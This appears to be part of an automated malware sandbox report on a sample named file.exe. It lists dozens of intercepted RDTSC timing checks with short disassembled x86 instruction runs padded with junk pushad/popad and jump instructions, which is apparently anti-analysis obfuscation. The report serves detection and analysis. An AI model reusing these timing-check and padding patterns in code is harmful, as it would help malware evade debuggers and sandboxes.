                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2AD6 second address: 7E2B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8CDABF4h 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007FD0F8CDABEEh 0x00000012 jnl 00007FD0F8CDABE6h 0x00000018 pushad 0x00000019 popad 0x0000001a jnp 00007FD0F8CDABEEh 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E40E8 second address: 7E40EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE5D5 second address: 7FE5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD44B second address: 7FD451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD451 second address: 7FD456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD756 second address: 7FD75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDA32 second address: 7FDA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD6B second address: 7FDD6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD6F second address: 7FDD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD0F8CDABF5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD8D second address: 7FDD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDF38 second address: 7FDF43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE311 second address: 7FE316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE316 second address: 7FE323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE323 second address: 7FE348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FD0F8E1A7A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 jbe 00007FD0F8E1A7A6h 0x0000001c popad 0x0000001d jo 00007FD0F8E1A7AEh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800FB1 second address: 800FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804361 second address: 80436B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0F8E1A7A6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80436B second address: 804371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803EB2 second address: 803EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803EBB second address: 803EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803EBF second address: 803EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC01B4 second address: 4EC01D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC01D1 second address: 4EC01E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC01E1 second address: 4EC01E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF05E5 second address: 4EF0619 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD0F8E1A7ABh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov eax, 03D9ACEBh 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD0F8E1A7B4h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0619 second address: 4EF061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF061D second address: 4EF0623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0623 second address: 4EF0629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0629 second address: 4EF062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF062D second address: 4EF0631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0631 second address: 4EF0648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push edi 0x0000000c mov edi, esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ch, 78h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0648 second address: 4EF0651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2AAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8015E second address: 4E80164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80164 second address: 4E801E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD0F8CDABF0h 0x0000001c push dword ptr [ebp+04h] 0x0000001f jmp 00007FD0F8CDABF0h 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 jmp 00007FD0F8CDABF0h 0x0000002c push dword ptr [ebp+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FD0F8CDABF7h 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA0BFF second address: 4EA0C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA0C03 second address: 4EA0C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA0C09 second address: 4EA0C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB0251 second address: 4EB0257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB0257 second address: 4EB025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB025B second address: 4EB025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0509 second address: 4EF0566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FD0F8E1A7B9h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f jmp 00007FD0F8E1A7ACh 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007FD0F8E1A7B0h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD0F8E1A7B7h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC04A5 second address: 4EC04B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC04B9 second address: 4EC04FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007FD0F8E1A7B4h 0x00000012 mov bx, ax 0x00000015 pop eax 0x00000016 mov ebx, 21965A32h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD0F8E1A7ABh 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC04FB second address: 4EC0501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0501 second address: 4EC0538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007FD0F8E1A7B0h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 pushad 0x00000015 mov esi, 3FF7D3FDh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0538 second address: 4EC053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA056F second address: 4EA05B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7B3h 0x0000000c or ecx, 35E789DEh 0x00000012 jmp 00007FD0F8E1A7B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA05B0 second address: 4EA05E5 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FD0F8CDABF7h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD0F8CDABF0h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA05E5 second address: 4EA05F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC005B second address: 4EC0101 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 pushfd 0x00000006 jmp 00007FD0F8CDABF8h 0x0000000b or al, 00000008h 0x0000000e jmp 00007FD0F8CDABEBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FD0F8CDABF4h 0x0000001f xor cl, 00000068h 0x00000022 jmp 00007FD0F8CDABEBh 0x00000027 popfd 0x00000028 jmp 00007FD0F8CDABF8h 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ecx, edi 0x00000035 pushfd 0x00000036 jmp 00007FD0F8CDABF9h 0x0000003b sbb ah, FFFFFFE6h 0x0000003e jmp 00007FD0F8CDABF1h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0101 second address: 4EC0126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC037C second address: 4EC0382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0382 second address: 4EC0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0391 second address: 4EC0395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE06FF second address: 4EE072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE072C second address: 4EE0750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0750 second address: 4EE0756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0756 second address: 4EE07A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FD0F8CDABF9h 0x00000017 adc esi, 657A9726h 0x0000001d jmp 00007FD0F8CDABF1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE07A2 second address: 4EE07A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE07A8 second address: 4EE07F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [775165FCh] 0x0000000d pushad 0x0000000e call 00007FD0F8CDABF0h 0x00000013 mov edx, eax 0x00000015 pop eax 0x00000016 popad 0x00000017 test eax, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007FD0F8CDABF6h 0x00000021 call 00007FD0F8CDABF2h 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE07F9 second address: 4EE07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE07FF second address: 4EE0816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD16B28DD45h 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov dh, 09h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 mov cl, bl 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0816 second address: 4EE088D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, eax 0x00000009 pushad 0x0000000a mov ebx, ecx 0x0000000c pushfd 0x0000000d jmp 00007FD0F8E1A7B8h 0x00000012 or esi, 2D25D248h 0x00000018 jmp 00007FD0F8E1A7ABh 0x0000001d popfd 0x0000001e popad 0x0000001f xor eax, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B5h 0x00000029 sbb ecx, 11F99F66h 0x0000002f jmp 00007FD0F8E1A7B1h 0x00000034 popfd 0x00000035 movzx esi, bx 0x00000038 popad 0x00000039 and ecx, 1Fh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE088D second address: 4EE08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08A1 second address: 4EE08CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7ADh 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 ror eax, cl 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08CC second address: 4EE08D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08D0 second address: 4EE08D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08D6 second address: 4EE08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08DC second address: 4EE0942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD0F8E1A7AEh 0x00000010 sbb eax, 1D00E6F8h 0x00000016 jmp 00007FD0F8E1A7ABh 0x0000001b popfd 0x0000001c call 00007FD0F8E1A7B8h 0x00000021 movzx eax, dx 0x00000024 pop ebx 0x00000025 popad 0x00000026 retn 0004h 0x00000029 nop 0x0000002a mov esi, eax 0x0000002c lea eax, dword ptr [ebp-08h] 0x0000002f xor esi, dword ptr [00552014h] 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b push eax 0x0000003c call 00007FD0FD7EB00Dh 0x00000041 push FFFFFFFEh 0x00000043 jmp 00007FD0F8E1A7AAh 0x00000048 pop eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FD0F8E1A7AAh 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0942 second address: 4EE0948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0948 second address: 4EE09C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 and cl, FFFFFFE8h 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 popfd 0x00000012 push eax 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007FD0FD7EB04Ch 0x0000001f mov edi, edi 0x00000021 pushad 0x00000022 push ecx 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B7h 0x00000029 xor ecx, 0A21DADEh 0x0000002f jmp 00007FD0F8E1A7B9h 0x00000034 popfd 0x00000035 pop esi 0x00000036 movsx ebx, si 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FD0F8E1A7B2h 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09C5 second address: 4EE09C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09C9 second address: 4EE09CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09CF second address: 4EE09D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, BD23h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09D8 second address: 4EE09EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7ABh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09EE second address: 4EE0A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD0F8CDABEFh 0x0000000a adc cx, 3AFEh 0x0000000f jmp 00007FD0F8CDABF9h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 call 00007FD0F8CDABECh 0x0000001d jmp 00007FD0F8CDABF2h 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007FD0F8CDABEBh 0x00000029 sub ecx, 790F15BEh 0x0000002f jmp 00007FD0F8CDABF9h 0x00000034 popfd 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov bh, 4Bh 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90019 second address: 4E9003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9003E second address: 4E900AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABF1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov si, 0D73h 0x00000015 pushfd 0x00000016 jmp 00007FD0F8CDABF8h 0x0000001b sub ah, 00000078h 0x0000001e jmp 00007FD0F8CDABEBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD0F8CDABF0h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E900AA second address: 4E900B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
